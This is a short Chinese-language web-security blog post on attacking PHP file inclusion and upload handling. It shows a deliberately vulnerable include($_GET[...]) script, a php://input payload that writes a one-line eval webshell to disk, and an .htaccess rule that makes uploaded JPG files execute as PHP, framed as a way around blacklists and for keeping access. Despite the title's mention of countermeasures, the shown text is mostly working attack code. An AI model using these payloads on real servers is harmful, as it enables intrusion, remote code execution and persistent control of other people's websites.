文件上传漏洞及其绕过、对策、过狗

作者: 康康 分类: Web安全 发布时间: 2017-01-07 21:45

1.  文件包含上传:

php://input属于php内置的封装协议,其实都主要是include()函数处理不当
如果有文件是以下写法,xxx随便:
<?php
  include($_GET['xxx']);
 ?>

以上保存到test.php,

我们访问http://127.0.0.1/test.php?xxx=php://input
然后我们通过POST提交php代码。在hackbar的POST区可利用此写入一句话木马:
<?php fwrite(fopen("payload.php","w"),'<?php eval($_POST["cc"]);?>');?>

效果就是test.php相同目录下生成payload.php,内容就是一句话木马。

2.。htaccess

<FilesMatch "2232">
    SetHandler application/x-httpd-php
</FilesMatch>

。htaccess是一个分布式配置文件,阿帕奇的。与jpg分别上传至同意目录,可以让jpg解析为php

,用于对付黑名单,且可以用来权限维持

发表评论

电子邮件地址不会被公开。 必填项已用*标注